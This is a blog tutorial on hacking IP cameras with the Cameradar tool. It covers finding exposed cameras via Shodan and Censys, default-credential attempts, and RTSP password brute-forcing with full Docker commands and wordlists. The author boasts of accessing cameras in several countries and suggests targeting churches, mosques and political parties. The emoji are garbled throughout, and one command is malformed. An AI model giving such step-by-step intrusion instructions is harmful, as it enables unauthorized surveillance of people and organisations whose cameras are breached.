Cameradarš„: Hack IP Camerasš --Be Omniscient --š»
- alvin gitonga
- Feb 18, 2023
- 4 min read
CyberMoransš¤
As you may know, we have played some OSINT roles for Ukraine since the invasion began. One of this roles is the hacking of IP cameras throughout the country. In this way, we can spy on Russian activities and war crimesā ļø We did this at the request of the Ukraine Army starting in February 2022 š
To hack these cameras we use multiple methods and techniquesš In hacking, always explore multiple methods to be successful. -- Persistence is a key hacker š trait --
As a hackerš it is important to take a strategic approach to any target. Always use the simplest methods first before progressing to more advanced attack methodsš
First step, we identified the unprotectedā ļø cameras using such sites as Shodan, Google Dorks, and Censys. Then, we tried default credentials. These default credentials vary by camera and manufacturer but that technique resulted to pwning a few camerasš
Next, we tried to hack the cameras with weak passwordsā ļø. This produced way more successful results!š The primary tool used is Cameradarš
In this tutorial, I will show you how to use Cameradar for IP camera hacking just like we did!
š Real Time Streaming Protocol: RTSP
RTSP is the protocol that most of these IP cameras use. Not all of the cameras use RTSP, but the vast majority do. Before proceeding, Note that those cameras using proprietary or other protocols will not be exploitable by cameradarš
RTSP is an application-layer protocol used for commanding streaming media servers via pause and play capabilities. It thereby facilitates real-time control of the streaming media by communicating with the serverāŗļø ā without actually transmitting the data itself.
It is an application-level network communication system that transfers real-time data from multimedia to an endpoint device by communicating directly with the server streaming the dataš„
The protocol establishes and controls the media stream between client devices and servers by serving as a network remote control for time-synchronized streams of continuous media, such as audio and videoš
It does not stream the multimedia itself but communicates with the server that streams the multimedia dataš§ -- When a user pauses a video they are streaming, RTSP would convey the user's request to pause the video to the video streaming server-- āŗļø
Like HTTP, RTSP uses TCP to maintain an end-to-end connection and, while most RTSP control messages are sent by the client to the server, some commands travel in the other directionš
š RTSP commands
Sent from the client to the server, when negotiating and controlling media transmissions:
š Options: This request determines what other types of requests the media server will accept.
š Describe: A describe request identifies the URL and type of data.
š Announce: The announce method describes the presentation when sent from the client to the server and updates the description when sent from server to client.
š Setup: Setup requests specify how a media stream must be transported before a play request is sent.
š Play: A play request starts the media transmission by telling the server to start sending the data.
š Pause: Pause requests temporarily halt the stream delivery.
š Record: A record request initiates a media recording.
š Teardown: This request terminates the session entirely and stops all media streams.
š Redirect: Redirect requests inform the client that it must connect to another server by providing a new URL for the client to issue requests to.
Other types of RTSP requests include āget parameter,ā āset parameter,ā and āembedded binary data,ā
Now, you are ready to start cracking IP cameras! š
š Download and Install cameradar
Cameradar can be run natively in Linux, but it works best in a docker container.
First, install docker š
kali > sudo apt install dockerNext, start docker with the systemctl commandš
kali > sudo systemctl start dockerNow, download cameradarš
kali> sudo git clone https://github.com/Ullaakut/cameradar Now, lets brute-force some IP cameras! ā
š Run the RTSP Credential Brute-forcer
Now that you have docker and cameradar installed, you only need to point cameradar at the IP address of the camera that you want to brute-force! For instance, to brute force a camera at 192.168.1.1 , we would š
kali > sudo docker run ullaakut/cameradar -t 192.168.1.101
Cameradar will now attempt to find a RTSP stream at one of the default RTSP ports namely 554, 5554 and 8554. If you suspect there may be other ports with RTSP streams --you may want to run an nmap scan first--, you can add them with the -p switch š
kali > sudo docker run ullaakut/cameradar -t 192.168.1.101 -p 9554š Use Custom Username & Password Lists
By default, cameradar uses a small username and password list of the most common usernames and passwords. It's good strategy to use these first but if they are unsuccessful, it's time to think out of the box!š
This means larger and more appropriate username and password lists --I personally like seclists-- . However from experience hacking cameras in Ukraine, Mexico, Syria, Sudan and Russia, the usernames usually are simple š¤ such as admin, root, admin1, admin3, etc. This means that you can probably use the default username list but passwords do varyš
That's why you should use a good password list that is appropriate for your environment and/or context of your target š¤--i.e, using a Spanish list in a Spanish speaking nation -- or the equivalent for a church, Mosque, Military, Political parties etc--š
First, the password list MUSTš¤ be in json format. There are several websites that can covert your text file to json for free such as https://anyconv.com/txt-to-json-converter/. Your .txt file will then be converted to one with a json extension. So, if we were using the seclist's password list š
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txtI would first convert it to json format and then use that file with cameradar. It will then appear as 10-million-password-list-top-1000000.json. Now to use that password list with cameradar, you can run the command š
kali> sudo docker run ullaakut/cameradar -t
-v /usr/share/seclists/Passwords/Common-Credentials:/tmp/dictionaries
-c "tmp/dictionaries/10-million-password-list-top-1000000.json"
-t 192.168.1.101
š This is easier than it seems...
Once you become familiar with the RTSP protocol, password cracking of IP camera credentials follows a similar process as other remote password cracking techniques. In fact, it may even be easier since the RTSP protocol rarely imposes a lockout limit on the number of attempts made. With cameradar, we were able to gain access to a significant number of IP cameras that had weak passwordsš²
šConclusion š¤
Subscribe to receive notifications of similar posts š where we will be reverse engineering malware, vulnerabilities as well as hacking vectors, stories, tutorials and other Infosec stuff...š
Follow me on twitter for daily Infosec Memes and shenanigansš
Morans,
Thank you for taking time and hope you learned something new, Like and leave a comment/review and as always, stay awesome! šš šŖ
Comments